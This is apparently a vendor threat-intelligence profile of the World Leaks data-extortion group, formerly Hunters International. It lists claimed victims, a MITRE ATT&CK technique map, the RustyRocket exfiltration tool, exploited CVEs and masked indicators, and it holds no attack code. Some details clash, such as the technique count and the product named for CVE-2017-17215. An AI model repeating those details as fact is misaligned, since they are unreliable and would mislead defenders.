1 malware familyExploits CVEs in the wild

World Leaks

Also known ashunters_internationalworld_leaksworldleaks

World Leaks is a cybercriminal extortion group that emerged in early 2025 as a rebrand of the Hunters International ransomware operation, which had been active since 2023. Reporting in the provided content describes World Leaks as the successor to Hunters International and notes a strategic shift away from file encryption toward pure data theft and leak-based extortion, with the group stealing company data and threatening public release unless payment is made. Known aliases in the content are World Leaks, WorldLeaks, world_leaks, and Hunters International. The group has been linked in the content to incidents affecting organizations in manufacturing, healthcare, technology, consumer services, and energy, with many claimed victims in the United States as well as victims in Europe, Canada, India, and China. Specific victim claims or links mentioned in the content include Tata Electronics, Nike, Dell, Bradford Health Services/Bradford Health Partners, Fred Hutchinson Cancer Center, and other organizations listed on its leak site. For Tata Electronics, World Leaks claimed to have stolen and published more than 200,000 files totaling over 630 GB, and reporting cited alleged exposure of emails, event logs, employee passport copies, SAP-related records, and documents tied to Apple and Tesla. The content also states that World Leaks made ransom demands in connection with Tata Electronics and that researchers observed the data on the group’s Tor-accessible dark web site. In the Nike case, World Leaks claimed theft of 1.4 TB across 188,000 files. The content also notes that some prior claims, such as Dell, involved more limited data than initially implied. The provided reporting states that World Leaks focuses on data exfiltration and extortion rather than encrypting victim systems. One source in the content says the group commonly gains initial access through phishing, compromised credentials, or exploitation of exposed services, then performs data discovery and exfiltration, prioritizing confidential corporate or personal information. The content also notes Hunters International use of Rclone as a primary exfiltration tool with WinSCP as a fallback in some intrusions. World Leaks is described in the content as an active extortion actor in the broader ransomware ecosystem despite its move away from encryption, and one report identifies LockBit, World Leaks, and TheGentlemen as leading groups observed targeting organizations in China.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

Technology Hardware & Equipment

Where they target

Geographies tied to known operations.

🇮🇳 India

MITRE ATT&CK

Tradecraft

42 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

13 of 15 tactics52 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0043

Reconnaissance

1 technique

T1598

Phishing for Information

TA0001

Initial Access

4 techniques

T1078×3

Valid Accounts

T1133×2

External Remote Services

T1190×4

Exploit Public-Facing Application

T1566×2

Phishing

TA0002

Execution

4 techniques

T1047

Windows Management Instrumentation

T1053

Scheduled Task/Job

T1059×2

Command and Scripting Interpreter

T1059.001

PowerShell

T1569

System Services

T1569.002

Service Execution

TA0003

Persistence

3 techniques

T1053

Scheduled Task/Job

T1078×3

Valid Accounts

T1133×2

External Remote Services

TA0004

Privilege Escalation

2 techniques

T1053

Scheduled Task/Job

T1078×3

Valid Accounts

TA0005

Stealth

2 techniques

T1036

Masquerading

T1036.005

Match Legitimate Resource Name or Location

T1078×3

Valid Accounts

TA0006

Credential Access

2 techniques

T1110

Brute Force

T1552

Unsecured Credentials

T1552.001

Credentials In Files

TA0007

Discovery

5 techniques

T1016

System Network Configuration Discovery

T1018

Remote System Discovery

T1046×2

Network Service Discovery

T1083

File and Directory Discovery

T1135

Network Share Discovery

TA0008

Lateral Movement

4 techniques

T1021

Remote Services

T1021.001

Remote Desktop Protocol

T1021.002

SMB/Windows Admin Shares

T1021.004

SSH

T1080

Taint Shared Content

T1210

Exploitation of Remote Services

T1570

Lateral Tool Transfer

TA0009

Collection

4 techniques

T1005

Data from Local System

T1039×2

Data from Network Shared Drive

T1074×5

Data Staged

T1213

Data from Information Repositories

TA0011

Command and Control

4 techniques

T1071

Application Layer Protocol

T1071.001

Web Protocols

T1105

Ingress Tool Transfer

T1571

Non-Standard Port

T1572

Protocol Tunneling

TA0010

Exfiltration

5 techniques

T1020×2

Automated Exfiltration

T1041×7

Exfiltration Over C2 Channel

T1048×3

Exfiltration Over Alternative Protocol

T1537×4

Transfer Data to Cloud Account

T1567×6

Exfiltration Over Web Service

T1567.002

Exfiltration to Cloud Storage

T1567.003×2

Exfiltration to Text Storage Sites

TA0040

Impact

2 techniques

T1486×16

Data Encrypted for Impact

T1657×12

Financial Theft

ARSENAL

Associated malware families

1 malware family attributed to this actor across reporting.

FamilyContextEvidenceLast seen

RustyRocketThe threat actor then downloaded agent.exe (RustyRocket, first identified and named by Accenture) which is a custom exfiltration platform that World Leaks distributes to their operators.2Apr 19, 2026

WEAPONIZED

Associated vulnerabilities

2 CVEs this actor has used in observed campaigns. 2 of them exploited in the wild.

CVE-2017-17215Remote Code Execution in Huawei HG532 SOAP ServiceIn the wildEvidence1

CVE-2017-17215 9.1 NETGEAR Routers (R6400, R7000, R8000) World Leaks, TheGentlemen, Devman Link

CVE-2025-21535Unauthenticated RCE in Oracle WebLogic Server via T3/IIOPIn the wildEvidence1

Other cases include Oracle WebLogic Server CVE-2025-21535, a missing authentication vulnerability tied to initial access in activity attributed to Hunters International...

IOCS

Observables

15 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

15 IOCsView more in app

Domains

8 total

••••••.com•••••••.ru••••••••.com•••••••••.net••••••••••.com•••••••••••.ru••••••••••••.com••••••.ru

ip.v4

5 total

••••••••••••••••••••••••••••••••••••••••••••••••••

hash.sha256

2 total

•••••••••••••••••

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

20 SOURCESView more in app

security affairsNews

Jun 25, 2026

Tata Electronics Confirms Data Breach After 630GB Leak Claim Targets Apple and Tesla

Ransomware gang active since 2023 that later rebranded into WorldLeaks and shifted from file encryption to pure data theft and extortion.

hipaa journalNews

Jun 25, 2026

Bradford Health Services; Bradford Health Partners Settle Data Breach Lawsuit

Claimed responsibility for the cyberattack against Bradford Health Services and Bradford Health Partners and stated that it exfiltrated more than 760 GB of data.

the record mediaNews

Jun 24, 2026

Indian auto giant Bajaj Auto hit by ransomware incident | The Record from Recorded Future News

Extortion group that has claimed attacks against organizations across multiple sectors including manufacturing, healthcare, technology, consumer services, and energy.

cysecurity newsNews

Jun 24, 2026

Tata Electronics Confirms Cybersecurity Incident, Says Business Operations Remain Unaffected - CySecurity News - Latest Information Security and Hacking Incidents

Data theft and extortion operations, threatening to publicly release stolen information unless demands are met; allegedly claimed theft and publication of data from Tata Electronics and has been linked to incidents involving Dell and Nike.

+98 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping42

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal1

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs2

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables15

Domains, IPs, and hashes tied to this actor, refreshed continuously.